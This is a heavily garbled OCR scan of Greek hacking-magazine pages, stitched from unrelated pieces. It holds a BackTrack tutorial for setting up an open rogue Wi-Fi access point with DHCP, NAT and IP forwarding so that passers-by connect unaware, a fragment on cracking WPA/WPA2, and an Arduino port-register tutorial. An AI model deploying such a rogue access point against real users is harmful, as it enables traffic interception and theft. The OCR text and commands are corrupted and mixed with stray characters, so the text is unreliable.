gadgets που βρίσκονται εντὀς εμβέλειας του access point (AP) κι ελἐγ- 


Δημιουργία ενός too-good-to-be-true Rccess Point! 


VLL 


χουν την περιοχή yia διαθέσιμα — ..cosMoTE 5 12:17 50% [ш 


APs. Καλό auró :) Βέβαια οι clients 
δεν μπορούν акра va συνδεθούν 
στο ΑΡ µιας kai nico του δεν βρἰ- 
σκεται κάποιος DHCP server που 
να μοιράζει διευθύνσεις IP. Μην 
ανησυχείτε, θα το φροντίσουμε 


‘Settings Wi-Fi Networks 


| Wi-Fi 


Choose a Network... 


αμέσως. 
CYTA sve а= © 

Στήσιμο DHCP server 

. . А Y deltaWiFi = Ө 
Ανοίγουμε ἑνα παράθυρο тєрнат!- 
кой (δεν κλείνουμε αυτό στο οποίο Northern Outpost а= © 
τρἐχει το airbase-ng) κι αµέσως 
εγκαθιστούμε vav DHCP server Other... › 


yia то BackTrack pac: - > 


Known networks will be joined 
automatically. If no known networks are 
available, you will have to manually select 


a neta 


root@bt:~# apt-get install 
dhcp3-server 


| Ask to Join Networks 


Reading package lists... Done 
Building dependency tree 


Reading state information... 
Done 


Suggested packages: 
dhcp3-server-ldap apparmor 
The following NEW packages will be installed: 
dhcp3-server 
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. 
Need to get 0B/377kB of archives. 


After this operation, 885kB of additional disk space will be 
used. 


Preconfiguring packages ... 
Selecting previously deselected package dhcp3-server. 


(Reading database ... 
installed.) 


Unpacking dhcp3-server (from 
1386.460) ... 


Processing triggers for man-db ... 


230952 files and directories currently 


.../dhcp3-server 3.1.3-2ubuntu3.2 


Processing triggers for ureadahead ... 
Setting up dhcp3-server (3.1.3-2ubuntu3.2) ... 
Generating /etc/default/dhcp3-server... 

* Starting DHCP server dhcpd3 

* check syslog for diagnostics. [fail] 


invoke-rc.d: initscript dhcp3-server, action "start" failed. 


Αγνοήστε αυτό το τελευταίο μήνυμα λάθους, δεν εἰναι τίποτε ro σοβαρὀ. 
Πρέπει va συντάξουµε το αρχείο ρυθμίσεων του DHCP server, алла про- 


τα ας πάρουμε ἑνα backup του πρωτότυπου αχείου: 


root@bt:~# mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIG 


Μπορεί ο φίλος 
µας να µην ἐχει 
καλό σήμα στο 
κινητό του, βρήκε 
όµως ἑνα ανοικτὀ 
wireless network. 
Συνδέθηκε au£- 
σως, περιττό να 
σημειώσουμε. Σιγά 
µην του συνέβαινε 
кат! κακὀ - аита 
εξάλλου συμβαί- 
νουν μόνον στους 
ἄλλους! 
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Па va µην καθόσαστε va πληκτρολογείτε, κατεβάστε ro αρχείο pu8pios- 
ων που έχουμε ετοιμάσει εμείς: 
root@bt:~# cd /etc/dhcp3 


root(bt:/etc/dhcp3st wget http://bit.ly/dh003dhcpConf --output- 
document-dhcpd.conf 


root(bt:/etc/dhcp3st cat dhcpd.conf 

option domain-name-servers 8.8.8.8; 

default-lease-time 60; 

max-lease-time 72; 

ddns-update-style none; 

authoritative; 

log-facility 1оса17; 

subnet 192.168.55.0 netmask 255.255.255.0 4{ 
range 192.168.55.100 192.168.55.150; 
option routers 192.168.55.1; 
option domain-name-servers 8.8.8.8; 

j 

root(bt:/etc/dhcp3s cd 

root()bt :~# 


Όπως βλέπετε апо την ἐξοδο του cat, o DHCP server µας θα μοιράζει 
διευθύνσεις ІР απὀ το 192.168.55.100 ἑως και то 192.168.55.150, ενώ 
o DNS server nou θα εξυπηρετεί τους clients θα εἶναι ο δημόσιος της 
Google (8.8.8.8). О router yia τους clients Ва εἶναι o 192.168.55.1 και στο 
σημείο αυτὀ οφείλουμε va δώσουμε ro προαναφερθὲν IP στο interface µε 
ὀνομα аї0, που ἐφτιαξε πριν λίγο το airbase-ng: 


root@bt:~# ifconfig αἴθ up 192.168.55.1 netmask 255.255.255.0 
root@bt:~# ifconfig 


ato Link encap:Ethernet HWaddr 00:pp:qq:nrnr:ss:tt 


inet addr:192.168.55.1 Всаѕ1:192.168.55.255 
Mask:255.255.255.0 


inet6 addr: fe80::2c0:caff:fe52:abb4/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
АХ packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:6 errors:0 dropped:0 overruns:0 carrier:O 
collisions:0 txqueuelen:500 

RX bytes:0 (0.0 B) TX bytes:468 (468.0 B) 


Пара поло ωραία. Πριν ξεκινήσουμε rov DHCP server yia то atO, ας φτιά- 
ξουμε éva symbolic link διότι διαφορετικἁ o server θα παραπονεθεἰ κι 
εμεὶς εἰμαστε ευαἰσθητοι р’ αυτά: 


root@bt:~# ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid 
Ακολούθως ενεργοποιούµε rov DHCP server yia ro at0: 
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root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf αἴθ 


Internet Systems Consortium DHCP Server V3.1.3 

Copyright 2004-2009 Internet Systems Consortium. 

All rights reserved. 

For info, please visit https://www.isc.org/software/dhcp/ 
Wrote ϐ leases to leases file. 

Listening on LPF/at0/00:c0:ca:52:ab:b4/192.168.55/24 
Sending on LPF/at0/00:c0:ca:52:ab:b4/192.168.55/24 


Applications Places System 
л о [κ root@bt: ~ 
File Edit View Terminal Tabs Help 


root(àbt: ~ % |root@bt: ~ b" 

12:39; Got b st pr j 

12:39: Got b st pr О κότοχος TOU 
12:39: Got br St p ανοικτού, wireless 
2:30: Got b st pr access point εἰναι 
2:39: Got b st pr ένας φιλήσυχος фі- 
2:30: Got b st pr λος του BackTrack 

12:39: Got b st pr ρε A 
12:40: Got broadcast p νει μέσα апд rov 
12:40: Got broadcast pr πειραματισμό ка! 
12:40: Got broadcast pr την εξερεύνηση. 
2:40: Got broadcast р Και ναι, μόλις εἶδε 
2:40: Got broadcast pr 64:89: ότι κάποιος ευγε- 
12:40: Got broadcast p 64:B9: νέστατος κύριος 
12: 40 Got broadcast probe from E0:46: ἡ κυρία θέλει va 
12: Got b cast probe from 00:23: Tov βοηθήσει στα 
12: Got b cast probe om 00:23 μη 196 ШС 
12: Got b cast probe from 00:23: D δρα ONE. 
2:40:35 бої broadcast probe om 00:23: οι λεπτομέρειες στο 

12:4 Got broadcast probe from 64:B9: άρθρο που ξεκινά 
12:40:54 бої broadcast probe from : B9: апо τη σελίδα 92! 

12:40:54 Got broadcast probe om : 
2:41:23 бої broadcast probe "om 

12:41:23 Got broadcast probe From 

12:41:23 D сё Γ From 98 

12:41:23 From 8: 

12:41:23 from :08: 

12:41:23 98: - "deltaWiFi" 

12:41:23 (open sy om) 

12:41:23 - (unencrypted) to ESSID: "deltaWiFi" 

12:41:25 st probe req :08: 

12:41:25 ) st probe rec 08: 

12:41:25 ) st probe гес 

2241:25 D st probe гес 

12:41:25 ) st probe req 

12:41:25 бої broadcast probe гед 

12:41:25 бої broadcast probe req 

12:41:25 бої broadcast probe req :08: 

12:41:33 бої broadcast probe req :46: 

12:41:34 бої broadcast probe req 23. 

12:41:34 бої broadcast probe req Ως}. 

12:41:34 Got broadcast probe requ "23 

12:41:35 бої broadcast probe req 223: 
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Sending on Socket/fallback/fallback-net 
κι επαληθεύουµε бт! τρέχει: 


root@bt:~# ps aux | grep dhcpd3 


dhcpd 11389 0.0 0.1 3864 1664 ? Ss 19:48 0:00 
dhcpd3 -cf /etc/dhcp3/dhcpd.conf ato 
root 11391 0.0 0.0 3372 748 pts/1 S+ 19:48 0:00 


grep --color=auto dhcpd3 


Όλα τέλεια. Όπως µπορείτε να διαπιστώσετε µε µια γρήγορη δοκιμή, στο 
ΑΡ µε ὀνομα deltaWiFi μπορούν πλέον να συνδέονται οι wireless clients 
και να παίρνουν διευθύνσεις ІР. Αυτὸ που ακόµη δεν μπορούν να κάνουν 
εἶναι να σερφἀάρουν στο Internet, κι auró διότι το BackTrack box δεν 
λειτουργεί ως router. Όμως µην ανησυχείτε: Ευθὺς αμέσως θα το ppo- 
ντίσουµε κι AUTÒ! 


Το апараітпто routing 


Κατ’ αρχὰς πρέπει να προσθέσουµε ἑνα νέο entry ото routing table του 
πυρήνα: 


root@bt:~# route add -net 192.168.55.0 netmask 255.255.255.0 gw 
192,.368.55.1 


Στη συνέχεια ενεργοποιούµε τους κατάλληλους κανόνες για то iptables 
ὠστε τα πακέτα του аї0 να προωθούνται στο eth0, апо το οποίο βγαίνει 
το BackTrack µας στον ἐξω κόσμο: 


root@bt:~# iptables --flush 

root@bt:~# iptables --table nat --flush 

root@bt:~# iptables --delete-chain 

root@bt:~# iptables --table nat --delete-chain 

root@bt:~# iptables -P FORWARD ACCEPT 

root@bt:~# iptables -t nat -A POSTROUTING -o ethð -j MASQUERADE 
Τέλος, ενεργοποιούµε то IP forwarding στον πυρήνα του λειτουργικού: 

root@bt:~# echo "1" > /proc/sys/net/ipv4/ip forward 


Αυτό ἦταν. Δοκιμάστε тора να συνδεθείτε oro ανοικτὀ ασύρματο δίκτυο 
µε ὀνομα deltaWiFi. Θα διαπιστώσετε ὁτι: а) η σύνδεση επιτυγχάνεται 
Χωρίς να ζητηθεί κἄποιο password, B) πήρατε µια διεύθυνση IP της pop- 
φἠς 192.168.55.*, ү) ἄνετα μπορείτε να σερφάρετε στο ἱντερνετ. Όλα 
δείχνουν πολύ ωραία, λοιπὀν! Εἶναι λογικό ν΄ αναρωτιέται κανεὶς τι како 
ἡ £oro παράξενο μπορεὶ να συμβεἰ σε κἀποιον που χρησιμοποιεί ¿va 
τέτοιο δίκτυο. Н απάντηση εἰναι στο άρθρο που ξεκινά апо τη σελἰδα 92 
του περιοδικού. 


Άσκηση yia το σπίτι. Φτιάξτε éva BASH script που θα αυτοματοποιεί τη 
διαδικασία που περιγράψαµε στο παρὀν άρθρο. Παραμετροποιήστε TO ως 
προς ro interface που χρησιμοποιεί ro BackTrack yia να βγαίνει στο ἴντερ- 
VET KI ως προς εκείνο που αντιστοιχεί στην ασύρματη карта δικτύου στην 
οποία συνῥέονται οἱ wireless clients. Προαιρετικά, προσθέστε στο script 
каубтпт@ χειρισμού λαθών (π.χ., η ασύρματη карта δεν εἰναι παρούσα). 
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Επίθεση για σπάσιµοτου ον το σι 
WPA/WPA2 (10 µέρος) cH танта 


Αρχείο δημοσιεύσεων 
Posted by praeto | 02/06/2010, 23:23 | Published in blast from the past | Ec - - 
Γενικό προφίλ 


Σίγουρα δεν ζείτε σε πιθάρι. Είτε από παλαιότερά µας 


Antivirus Kot σὺ Е άρθρα και αναφορές, εἴτε από κάποια άλλη δημοσίευση 1000070 forum 
σπέρασμα An roti, 00:101 στο internet, είτε από κάποιο φίλο, όπως και να χει, Αποσύνδεση 
про pzyow 115095 γνωρίζετε πια ότι το πρωτόκολλο МЕР σπάει πλέον 
πανεύκολα και δεν µπορεί να προσφέρει αποτελεσματική Αναζήτηση 


ασφάλεια σ’ ένα ασύρματο δίκτυο. Έτσι, για να αποφύγετε 
περιπέτειες µε κακόβουλους εισβολείς, καταφύγατε στο 
WPA ή στο WPA2 που υπόσχονται σηµαντικά μεγαλύτερη 
ασφάλεια. Και καλά κάνατε, αλλά µην εφησυχάζεστε. 
Όπως θα δείτε, υπό συγκεκριμένες συνθήκες, οι οποίες δεν 
είναι καθόλου σπάνιες, το WPA/WPA2 µπορεί να σπάσει 
εξίσου εύκολα και γρήγορα, όπως και το WEP. 


Πιο συγκεκριµένα, το θέµα δεν αφορά την Enterprise έκδοση του 
-ούτως n άλλως- απαιτεί ειδικούς server και συναντάται πολύ 
Personal, η οποία είναι και n μόνη που υποστηρίζεται о 
modem/router που απευθύνονται για χρήση с 
WPA/WPA2-Personal είναι η μέθοδος authenticat 

Enterprise- γίνεται για όλε 

όπου και η εναλλακτι 

point (ΑΡ) ρυθμίζετ 

63 χαρακτήρες) 
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Πλήρη άρθρα που συμπληρώνουν το περιοδικό. Τα εβδομαδιαία µας 
video casts [έρχονται, έρχονται]. Ολόκληρα blasts from the past. 
Ta βίντεο оло та live streams. Τα πάντα ενδιαφέροντα forums. To 


σημείο συνάντησης για τους φίλους του περιοδικού. H πιο ζωντανή 
κοινότητα και οι πιο ανήσυχοι, ónpioupyikoií χρήστες! 
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Υπάρχει κανεὶς που δεν θέλει να γνωρίζει ἔξυπνες 
τεχνικὲς γύρω ano τη χρήση rou Arduino; 
Υπάρχει κάποιος που δεν εκτιμά τα μικρὰ και 
απλά παιχνίδια, που µας διδάσκουν κομψές 
κι αποδοτικἑς μεθόδους προγραμματισμού; 
Υπάρχει κανεὶς που δεν θέλει να γνωρίζει, WOTE 
να μπορεῖ να σκαλίζει; Μεταξύ των αναγνωστών 
του deltaHacker, μᾶλλον δεν υπάρχει! Όσα 
ακολουθούν, επομένως, θα αρέσουν σε όλους ;) 
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Δεν εἶναι како να χρησιμοποιούμε £roipa script. То како εἶναι va µην 
ξέρουμε пос λειτουργούν και, ακόµα χειρότερα, va αδιαφορούµε για το 
πὼς λειτουργούν. Τότε γινόμαστε αυτὸ που λέμε script kiddies, χαζούλη- 
δες εξυπνάκηδες και διάφορα ἆλλα υποτιμητικά. AuTÓ που σίγουρα «δεν 
γινόμαστε εἰναι χάκερ. 


Το να αναβαθµἰζουμε εξάλλου τον υπολογιστή συνέχεια, επἰσης δεν εἶναι 
како. Ὅταν όμως αξιοποιούμε ἑνα µὀνο µέρος των πὀρων του συστήμα- 
τος, τότε οι απανωτὲς аүорёс αποτελούν σπατάλη χρημάτων και πόρων 
γενικότερα. 


Τίποτε апо τα παραπάνω δεν αρέσει σε εκείνους οι οποίοι -ασχέτως αν 
κάποιοι τους αποκαλούν χάκερ ἡ ὀχι- στην πραγματικότητα διακατέχο- 
ута! апо το πνεύμα του αληθινού χάκερ! Όμως Ла αυτά εἶναι λίγο πολύ 
γνωστὰ - ἡ τουλάχιστον ¿TOI θέλουμε να πιστεύουμε. Μπορούμε μάλιστα 
να δούμε αυτἠ τη λογικἠ va ακολουθεἰται σε διάφορες δραστηριότητες ἡ 
χόμπι των (αληθινὼν) χάκερ. 


ш Πάρτε yia παράδειγµα ro Arduino. 


To va παϊζουµε συνεχώς µε διάφορα shields δεν εἶναι како. Н ενασχόλη- 
ση µε ra shields εἶναι σίγουρα διασκεδαστικἠ και μπορεί να λειτουργήσει 
ως τεράστια πηγἠ έμπνευσης. Το како εἶναι να µην ἐχουμε απολύτως 
καμία ιδέα για το пос λειτουργούν. Πώς να το κάνουμε, η атака "it just 
works" δεν µας ταιριάζει", Θέλουμε να ξέρουμε πὼς δουλεύουν τα πρἀγ- 
рата, αφενὸς yia να μπορούμε va τα πειράζουμε κι αφετέρου για να 
τα συνδυάζουµε αποτελεσματικἁ και µε πιο ευρηματικούς τρόπους, апо 
εκεἰνους που εἶχαν катӣ vou οι αρχικοἰ δημιουργοί. Το ἰδιο ισχύει και 
µε τις ἐτοιμες βιβλιοθήκες του Arduino. Δεν εἶναι καθόλου како να τις 
αξιοποιούµε, ακόµη και ката коро. Όταν ὀμως σου αρέσει η τεχνολογία, 
θες να εμβαθύνεις συνεχώς. Θέλεις να ξέρεις πὼς λειτουργεί ro каӨғті, 
ακόµα κι αν δεν σκοπεύεις να το πειρᾶξεις ποτὲ. 


Σκεπτόὀµενοι κάπως ἐτσι αποφασίσαμε να ξεκινήσουμε µια γνωριμία µε 
διάφορες πτυχὲς της λειτουργίας του Arduino αλλά και των απλὠν yn- 
Φιακών κυκλωμάτων. Το ζητούμενο апо αυτή τη διαδικασία δεν εἶναι να 
γίνουμε Ηλεκτρονικοί Μηχανικοί, алла να γνωρίσουμε ἑξυπνες τεχνικὲς 
που θ’ ανοίξουν νέους δρόμους στη ok&ur µας. Πολὺ συχνὰ θα φτάνουμε 
σε χαμηλὸ επἰπεδο, oore να βρίσκουμε ἄκρως апоботікёс και ταχύτα- 
τες ως προς τη λειτουργἱα τους λύσεις. Βέβαια ορισμένες апо τις λύσεις 
αυτὲς θα εἶναι πολύπλοκες ως προς στην υλοποίηση. Κανένα πρὀβλημα! 
Δεν μαθαίνουμε τις “δύσκολες” λύσεις για να αντικαταστήσουμε τις “εὐ- 
κολες”2. Θέλουμε μόνο να εἴμαστε ευἑλικτοι κι ὁταν προκύπτει η ανάγκη, 
να ἔχουμε πολλὲς εναλλακτικὲς. 


Σηµείωση: Πα τη συνέχεια του ἀρθρου και ολόκληρης της σχετικής σειράς προὐποθέτουμε 

ότι ο αναγνώστης ἐχει µια βασική εξοικείωση µετην πλατφόρμα rou Arduino. Av ὀχι τότε πα- 

ροτρύνεται (ενθουσιωδώς!) να διαβάσει το εισαγωγικό άρθρο που δημοσιεύεται online, στο 
http://deltahacker.gr/2009/08/01/arduino-intro 


Επίσης, yia τη συνέχεια του παρόντος θα χρειαστείτε το αρχείο arduino sketch folders. 
zip, то οποίο περλαμβάνει τον πηγαίο κώδικα καθενός παραδείγματος και µπορείτε va TO 
κατεβάσετε απὀ το 

http://bit.ly/dhee3arduinoSketchFolders 


шош 1. Τουλάχιστον ὀχι πάντα”. 
" 2. Δεν εἰμαστε µαζοχιστές! 
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Όλα окто 


Ως γνωστὸν το Arduino βασίζεται с’ ἑναν 
μικροελεγκτή’; 8bit, αρχιτεκτονικής AVR. ммм ЬЬ а 
To πλήθος rov bit δηλώνει ro μέγεθος 
TOV καταχωρητώὠν (registers) του µικροε- 
λεγκτή. Όμως αυτὀ δεν εἶναι απόλυτα δι- 
αφωτιστικὀ. Στην πράξη, το γεγονὸς бт! 
πρὀκειται yia ἐναν οκτάμπιτο επεξεργαστή 
σημαίνει бт! κάθε στιγμὴ μπορεἰ va χειρἰζε- 
ται αριθμούς των окто bit και μόνο. Έτσι, 
όταν προσθέτουμε αριθμούς rov 16bit (апо 
0 ἑως 65546) η πράξη εκτελεἰται апо τον 
επεξεργαστἠ σε δύο βήματα, σε καθένα апо 
τα οποία προστίθενται αριθμοί των 8bit. 
Αντἰστοιχα, ὁταν επιδιώκουμε την ανά- 
γνωση ἡ την τροποποίηση ενὀς µόνο bit, ο 
επεξεργαστἠς αλληλεπιδρά µε ολόκληρο то 
byte, δηλαδὴ µε ολόκληρη την οκτάδα, που 
περιλαμβάνει το επιθυμητό bit. To εἰδος της 
αλληλεπίδρασης δεν ἐχει σημασία. Το on- 
раутіко εἶναι От! η εργασία µε το рероуо- 
μένο bit θα διαρκέσει ὁσο θα διαρκούσε και 
η εργασία µε ολόκληρο ro byte. О επεξερ- 
γαστἠς λοιπὸν νιώθει στο στοιχείο του όταν 
παίζει µε οκτάδες bit, ενὠ όταν του ζητάμε 
να χειριστεἰ μεγαλύτερα ἡ μικρότερα σύνο- 
λα bit καταφεύγει σε τερτἰπια. Συνεπώς, αν 
θέλουμε τον μικρότερο και ταχύτερο δυνατὸ κὠδικα θα πρέπει va 
αποφεύγουμε το χειρισμὸ μεμονωμένων bit ἡ μεγεθών που enep- 
νούν τα 8bit. Ας κρατήσουμε αυτἠὴν την πληροφορἰα κατὰ νου кі ας 
περάσουμε σε πιο πρακτικὰ ζητήματα... 


PUR SEL 


Πρώτη προσέγγιση 


Κάθε κατασκευἠ ue ro Arduino διαθέτει κάποιας µορφής εισόδους και 
εξόδους. Н κλασικὀτερη “συσκευή” εισόδου εἰναι μερικά κουμπιά (δι- 
ακὀπτες) ἡ uia συστοιχἰα κουμπιών, το λεγόμενο keypad. Ὅσο yia την 
ἐξοδο, στην απλούστερη µορφή της εἶναι μερικἁ LED ἡ ша συστοιχἰα 
апо LED (αυτό που ονομάζουμε LED matrix). Φυσικά υπάρχουν noAunAo- 
κότερα και εξυπνὀτερα περιφερειακἁ, αλλά δεν χρειάζεται να μπλέξουμε 
μαζὶ τους για την opa. Ἑστω λοιπὸν ὁτι θέλουμε να συνδέσουµε στο 
Arduino µας πέντε LED για να φτιάξουμε ἑναν “σύγχρονο” υπολογιστή, 
σαν εκείνους που εμφανίζονταν στις ταινίες του '60 και του '70 και ἦταν 
γεμάτοι λαμπάκια. Ας υποθέσουμε επἰσης ὁτι κάποια апо αυτά πρέπει να 
εἶναι αναμμένα ὁταν ξεκινάει το πρὀγραμμὰ µας, ενὼ στη συνέχεια πρὲ- 
πει όλα va αναβοσβήνουν. 


Το πιο απλὀ κύκλωμα για το σκοπὀ µας περιλαμβάνει μερικὰ LED που ci- 
ναι συνδεδεμένα στις ψηφιακές εξόδους του Arduino, µέσω αντιστάσεων 
των 4700. Συγκεκριµένα, η ἀνοδος κάθε LED συνδέεται στην αντίσταση 
και µέσω αυτής σε μία апо τις ψηφιακὲς εξόδους, ενώ η κάθοδος KaTa- 
λήγει στη γείωση (GND). Με aurr| τη συνδεσµμολογἱα órav κάποια απὀ τις 
3. О μικροελεγκτὲς εἶναι τσιπ που ενσωματώνουν vav επεξεργαστή, αποθηκευτικὀ χώρο үа TO πρόγραµµα, 


μνήμη RAM και реріка ακόµα περιφερειακά ώστε να λειτουργούν (σχεδὀν) αυτόνομα. Συχνά οι μικροελεγκτές 
ταυτίζονται µε τον επεξεργαστἠ που ενσωματώνουν, καθώς αποτελεί το μακράν σημαντικότερο µέρος τους. 


Το πιο απλό 
κύκλωμα εξόδου: 
Πέντε LED που 
έχουν συνδεθεί σε 
πέντε ακροδέκτες. 
Πρόκειται για ra 
Digital Pin 8 ἑως 
12 rou Arduino rj 
αλλιὼς та pin 0 
έως 4 rou PortB 
(РВО, ..., РВА). 
Όταν κάποιος апд 
τους ακροδέκτες 
αποκτά τη λογική 
τιµή 1 (5V), το 
αντίστοιχο LED 
ανάβει. 


To κύκλωμα της 
πλακέτας του 
Arduino δείχνει 
πού συνδέεται 
καθένας απὀ τους 
ακροδέκτες του. 
Έτσι, ra Digital Pin 
0 έως 7 συνδέο- 
vrai στο PortD, 
ενώ аита απὀ ro 8 
έως το 13 συνδέ- 
ονται στο PortB. 
Οι ἐξι ακροδέκτες 
που προορίζο- 
νται συνήθως για 
αναλογική εἰσοδο 
συνδέονται στο 
PortC. 
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Ψηφιακές εξόδους апокта τη λογικἠ τιμή 1, το αντίστοιχο LED ανάβει. 
Προφανώς, µε τη λογική Tipů 0 το αντίστοιχο LED σβήνει. О κὠδικας, 
όπως θα τον ἐγραφε κάποιος nou ακολουθεἰ πιστά τα εισαγωγικά napa- 
δείγματα του Arduino, βρίσκεται oro sketch µε то буора Code. 00 01. 
Μελετήστε τον για λίγο... 


Οι πρώτες γραμμές ρυθμίζουν ως εξόδους τους ακροδέκτες του Arduino, 
στους οποίους έχουμε συνδέσει та LED. Όσο για τις αµέσως επόμενες, 
αυτές αποδἰδουν σε κάθε ἐξοδο την κατάλληλη τιµή ὥστε κάποια LED va 
εἶναι αναμμένα και капота σβηστἀ. Ακολούθως, στη συνάρτηση loop() 
οι τιμὲς των εξόδων αντιστρἐφονται σε τακτά χρονικἁ διαστήματα (µε 
καθυστερήσεις που εισάγει η συνάρτηση delay), ὥστε ra LED να αναβο- 
σβήνουν. Απλός κὠδικας, κατανοητός και... спаталос̧! 


Πού εἶναι ra byte; 


О κὠδικας nou μελετήσαμε μοιάζει να κάνει кат! απλὀ και λογικὀ: Χει- 
ρἰζεται κάθε ακροδέκτη μεμονωμένα. Όμως κἆθε фора που αλλάζει η 
κατάσταση ενὸς ακροδέκτη, κάπου, κάπως, αλλάζει η τιµή ενὸς bit που 
ορίζει την κατάσταση του συγκεκριμένου ακροδέκτη. Τι συμβαίνει, λοι- 
nóv; Μήπως пау περἰπατο беа εἰπαμε για τη pavia rou επεξεργαστή µας 
va ασχολεῖται µε bytes; Προφανώς ὀχι. Αλλά ας πάρουμε τα πράγματα 
anó την αρχή. 


О επεξεργαστἠς rou Arduino^ επικοινωνεἰ ue то περιβάλλον του µέσω των 
λεγόμενων port. Ta port αποτελούν οµάδες ακροδεκτὠν (pin) του επε- 
ξεργαστή, καθεμία апо τις οποἰες διαθέτει то δικὀ της μηχανισμό χειρι- 
оной. Εἶναι αυτονόητο πως για κάθε ακροδέκτη ο επεξεργαστής γνωρίζει 
ауа πάσα στιγµἠ το αν λειτουργεί ως εἰσοδος ἡ ως ἐξοδος, ὀπως επίσης 
και την κατάστασή rou (high ἡ low). Αναρωτιέστε πού διατηρούνται au- 

τὲς οι πληροφορίες; Μα, φυσικά, 
{54 στο μηχανισμὀ χειρισμού TOU εκά- 
στοτε port, ο οποίος αποτελείται 
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anó τρεις καταχωρητές. Συγκεκρι- 
μένα, για κάθε port υπάρχει ἑνας 
καταχωρητής του οποίου ra bit Ka- 
θορίζουν τη βασικἠ λειτουργία (εἰ- 
σοδος ἡ ἐξοδος) των αντίστοιχων 
ακροδεκτὠν. Υπάρχει ἑνας ακόμα 
που διατηρεί τις τιμές (high ἡ low) 
για τους ακροδέκτες που λειτουρ- 
үойу σαν ἐξοδοι, καθώς και ἑνας 
τρίτος που χρησιμοποιείται για 
το διάβασμα της κατάστασης των 
ακροδεκτὠν που λειτουργούν σαν 
εἰσοδοι. 


Εξετάζοντας το κύκλωμα της πλα- 
κἐτας rou Arduino θα παρατηρή- 
σουµε бт! οι ακροδέκτες 0 έως 7 
εἶναι συνδεδεμένοι στις επαφὲς 
Ρῦ-κάτι του επεξεργαστή, Οἱ akpo- 
δέκτες 8 ως 13 εἶναι συνδεδεμένοι 
στις єпафёс̧ PB-kári και οι акробё- 
κτες που προορἱζονται yia αναλο- 


4. Βασικά ὁλοι οι AVR, αλλά οι υπόλοιποι δεν µας απασχολούν. 
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γικἠ εἰσοδο συνδέονται στις επα- 
pç PC-kàári. О επεξεργαστής του пики иши 
Arduino, Aoinóv, διαθέτει τρία port: eses ..s 
TO PortB, ro PortC kai ro PortD. Ас 
δούμε ro PortB. H λειτουργία Ka- 
θενὸς акробёктп σε αυτὸ то port 
περιγράφεται anó £va bit στον κα- 
ταχωρητἠ DDRB. О ἆσσος σε Kå- 
ποιο bit σημαίνει ότι το αντίστοιχο 
ποδαράκι λειτουργεί σαν έξοδος, 
ενώ το μηδενικὀ συμβολίζει την εἰ- 
собо. Όταν κάποιοι ακροδέκτες εἰ- 
ναι ρυθμισμένοι σαν ἐξοδοι, τότε η 
κατάσταση καθενός περιγράφεται 
апо τα αντίστοιχα bit του καταχω- 
ρητή PORTB. Τέλος, όταν κάποιοι 
ακροδέκτες εἰναι ρυθμισμένοι σαν 
εἰσοδοι, μπορούμε να μάθουμε την 
κατάσταση καθενὸς διαβάζοντας 
τα αντἰστοιχα bit στον καταχωρητή 
ΡΙΝΒ. Προφανώς τα ἴδια ισχύουν 
για τα άλλα port του επεξεργαστήἠ 
του Arduino, των οποίων τα ονό- 
ната σχηματίζονται µε παρόμοιο 
τρὀπο (DDRC, PORTC και PINC yia 
TO PortC, καθὼς και DDRD, PORTD шым. arduino. ce 
και PIND yia ro PortD). Έχοντας à m POUER ANALOG 
όλα αυτά υπόψη, μπορούμε va eni- план S 
στρἐψουµε στο παράδειγµα nou 
εξετάζουμε. 


Μαζική ἐξοδος 


Αυτἠ τη фора yia την οδήγηση των 
LED θα αξιοποιήσουµε τους KaTa- 
χωρητὲς του αντίστοιχου port του 
Arduino. Ta LED εἶναι συνδεµένα 
στα "digital pin" του Arduino, απὀ 
TO 8 ως το 12. Αυτά ra pin όμως 
(σύµφωνα µε то κύκλωμα της πλα- 
κἐτας του Arduino) καταλήγουν 
στους ακροδέκτες PBO, PB1, PB2, 
PB3 kai PB4 rou επεξεργαστἠ. Με 
алЛа λόγια, στους πρώτους πέντε 
ακροδέκτες rou PortB. Επομένως, 
για то χειρισμὸ των LED θα aoyo- 
ληθούμε нє ra прота πέντε bit των 
катаҳорптоу rou PortB. О avave- 
ωμένος κὠδικας Φφαΐνεται парака- 
τω: 


Καθένας апд τους τρεις διακόπτες συνδέεται σε ἐναν ακροδέ- 


void setup() { ктп του Arduino στα 5V. Οι αντιστάσεις συνδέονται μεταξύ των 
DDRB = B00011111; ακροδεκτών. του Arduino ка! TOV ov (GND) ка! πετυχαίνουν TO 
λεγόμενο pull-down. Όταν ἑνας διακόπτης δεν εἶναι πατημένος, о 

PORTB = B00001010; αντίστοιχος акробёктпс Ва βρίσκεται στην κατάσταση low (OV). 
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} 
void loop() { 


delay(500); 
PORTB = PORTB ^ B00011111; 
j 


Ta прота névre bit του DDRB παίρνουν την τιμή 1 και, συνεπώς, oi npo- 
τοι πέντε ακροδέκτες του PortB γίνονται ἐξοδοι. Οι αρχικἐς ρυθμίσεις του 
προγράμματος ολοκληρώνονται µε την απὀδοση της κατάλληλης τιµἠς 
στον PORTB, ὥστε το δεύτερο και το τρίτο LED να ανάψουν. Εκτός апо 
τις арҳікёс̧ ρυθμίσεις, έχει απλοποιηθεἰ και ο μηχανισμός που αναβοσβή- 
νει та LED. Βλέπετε, тора nou επεμβαίνουμε σε ολόκληρα byte (στους 
καταχωρητές rou port), μπορούμε να χρησιμοποιούμε τους λογικούς TE- 
λεστὲς bitwise*. Στο πρὀγραμμα αξιοποιούμε τον τελεστἠ ^, ο οποίος 
συμβολίζει τη λογικἠ πράξη ХОК. Στη σχετικἠ γραμμὴ του κώδικα, ra bit 
του καταχωρητή PORTB γίνονται -éva προς éva- XOR µε ra bit του αριθ- 
μού 00011111. Συγκεκριµένα, τα прота πέντε bit του PORTB θα γίνουν 
XOR µε vav àooo, ενώ τα υπόλοιπα τρία µε ¿va µηδενικὀ. Όμως η πράξη 
XOR μεταξὺ ενὸς οποιουδήποτε bit κι ενὸς ἁσσου ἐχει σαν συνέπεια την 
αντιστροφἠ rou bit! Επομένως, κάθε фора που θα εκτελείται αυτή η пра- 
Еп (ауа 500ms) τα прота πέντε bit του PORTB θα αντιστἐφονται και то 
ἴδιο θα συμβαίνει στην κατάσταση των LED! 


Πρωτὀγονοι, αλλά κακοί! 


Ta LED εἰναι εὐκολα στο χειρισμὀ και паісоутас̧ най! τους μπορούμε va 
